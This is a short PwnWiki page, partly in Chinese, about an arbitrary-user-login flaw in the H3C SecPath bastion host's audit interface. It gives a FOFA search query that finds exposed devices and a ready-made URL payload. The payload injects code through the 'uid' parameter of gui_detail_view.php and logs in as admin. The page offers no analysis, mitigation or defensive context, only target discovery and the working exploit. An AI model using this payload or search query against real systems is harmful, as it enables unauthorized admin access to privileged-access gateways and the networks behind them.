H3C SecParh堡壘機 get detail view.php 任意用戶登錄漏洞

From PwnWiki
Revision as of 17:07, 7 May 2021 by Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="H3C-SecPath-运维审计系统" && body="2018" </pre> ==Payload== <pre> /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

FOFA

app="H3C-SecPath-运维审计系统" && body="2018"

Payload

/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin